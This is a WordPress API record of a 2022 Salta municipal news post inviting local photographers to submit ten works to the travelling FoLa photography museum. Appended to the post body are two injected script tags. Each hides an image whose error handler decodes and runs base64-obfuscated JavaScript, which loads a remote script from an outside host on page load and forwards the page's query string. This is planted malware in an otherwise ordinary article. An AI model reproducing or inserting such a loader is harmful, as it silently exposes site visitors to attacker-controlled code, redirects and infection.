{"id":1519,"date":"2022-09-21T16:38:28","date_gmt":"2022-09-21T19:38:28","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1519"},"modified":"2025-08-14T00:34:48","modified_gmt":"2025-08-14T03:34:48","slug":"el-municipio-convoca-a-fotografos-locales-a-participar-del-museo-itinerante-fototeca-latinoamericana","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1519","title":{"rendered":"El municipio convoca a fot\u00f3grafos locales a participar del Museo Itinerante Fototeca Latinoamericana"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#b00b34\"><strong><em>Se trata de la exposici\u00f3n que se realizar\u00e1 en la ciudad entre el 10 y 16 de octubre en Plaza Belgrano con entrada libre y gratuita. Se invita a los artistas a participar con 10 trabajos de su autor\u00eda en tem\u00e1tica libre.<\/em><\/strong><\/h4>\n\n\n\n<p>La Municipalidad de Salta convoca a fot\u00f3grafos locales a participar de la exposici\u00f3n que se realizar\u00e1 entre el 10 y el 16 de Octubre en&nbsp; el Museo Itinerante Fototeca Latinoamericana (FoLa). La misma se desarrollar\u00e1 en la Plaza Belgrano con entrada libre y gratuita.<\/p>\n\n\n\n<p>As\u00ed, en el D\u00eda Nacional del Fot\u00f3grafo, trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, se invita a los artistas de la ciudad a participar con 10 trabajos de su autor\u00eda en tem\u00e1tica libre. Los mismos, pueden ser de diferentes series o pertenecer a una sola serie seg\u00fan decida el autor<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/prensa.municipalidadsalta.gob.ar\/wp-content\/uploads\/2022\/09\/fotografos.jpg\" alt=\"\" width=\"429\" height=\"285\"\/><\/figure><\/div>\n\n\n<p>Los trabajos deber\u00e1n enviarse con la denominaci\u00f3n SALTA , agregando Nombre Apellido y cuenta de Instagram,&nbsp; por el sistema We Transfers al correo electr\u00f3nico gastondeleau@gmail.com hasta el 28 de septiembre.<\/p>\n\n\n\n<p>Para la exposici\u00f3n en el tr\u00e1iler del primer Museo Itinerante de Fotograf\u00eda FoLa, se realizar\u00e1 una selecci\u00f3n de los trabajos enviados<\/p>\n\n\n\n<p>\u00abQueremos llegar con la fotograf\u00eda a la mayor cantidad de gente posible. Hay personas que nunca se acercaron a un espacio de arte, aunque hubo antecedentes vinculados a las artes pl\u00e1sticas y la itinerancia, en el arte fotogr\u00e1fico es una idea innovadora\u201d, explic\u00f3 al respecto Gat\u00f3n Deleau, director y creador del proyecto.<\/p>\n\n\n\n<p>\u201cEn cada ciudad que visitamos, queremos que los vecinos se acerquen y participen de la propuesta, eso es lo que m\u00e1s nos gusta\u00bb, agreg\u00f3 Deleau.<\/p>\n\n\n\n<p>El 21 de septiembre se celebra el D\u00eda Nacional del Fot\u00f3grafo, en conmemoraci\u00f3n de la llegada a Latinoam\u00e9rica del daguerrotipo, el primer sistema de fotograf\u00eda creado por el inventor franc\u00e9s Louis Daguerre en su pa\u00eds en 1839.<\/p>\n\n\n\n<p><strong>Sobre el Museo Itinerante Fototeca Latinoamericana (FoLa)<\/strong><\/p>\n\n\n\n<p>Gast\u00f3n Deleau, cre\u00f3 el proyecto en 2016 y sum\u00f3 a la aventura a Marcos Bufano y Ana Pareta. El museo estuvo durante siete a\u00f1os, en el Distrito Arcos.<\/p>\n\n\n\n<p>La Fototeca Latinoamericana por decisi\u00f3n de Deleau, su creador y director, encar\u00f3 el desaf\u00edo de reinventarse y adquiri\u00f3 el formato itinerante.<\/p>\n\n\n\n<p>Desde entonces la FoLa, recorre el pa\u00eds a bordo de un tr\u00e1iler de 8 metros por 2,50, convirti\u00e9ndose en el primer Museo Itinerante de Fotograf\u00eda, con acceso totalmente libre y gratuito para el p\u00fablico y lleva recorridos 3.000 kil\u00f3metros, 17 ciudades y tiene previstas otras 9 m\u00e1s para este 2022.<\/p>\n\n\n\n<p>Este camino, se complementa, con una biblioteca rodante, proyecci\u00f3n de documentales y diferentes espacios de charla y talleres que se concretan con los pobladores de cada ciudad.<\/p>\n\n\n\n<p>En el interior del tr\u00e1iler, los visitantes pueden apreciar fotograf\u00edas enmarcadas de 42 fot\u00f3grafos y fot\u00f3grafas reconocidos de nuestro pa\u00eds, a lo que se suma la proyecci\u00f3n de im\u00e1genes de entre 10 y 30 fot\u00f3grafos de cada ciudad que se visita.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/prensa.municipalidadsalta.gob.ar\/el-municipio-convoca-a-fotografos-locales-a-participar-del-museo-itinerante-fototeca-latinoamericana\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_26-8-2022_104031_prensa.municipalidadsalta.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-1375\" width=\"96\" height=\"44\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se trata de la exposici\u00f3n que se realizar\u00e1 en la ciudad entre el 10 y 16 de octubre en Plaza Belgrano con entrada libre y gratuita. Se invita a los artistas a participar con 10 trabajos de su autor\u00eda en tem\u00e1tica libre. La Municipalidad de Salta convoca a fot\u00f3grafos locales a participar de la exposici\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1520,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-1519","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1519"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1519"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1519\/revisions"}],"predecessor-version":[{"id":7341,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1519\/revisions\/7341"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1520"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1519"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1519"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1519"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}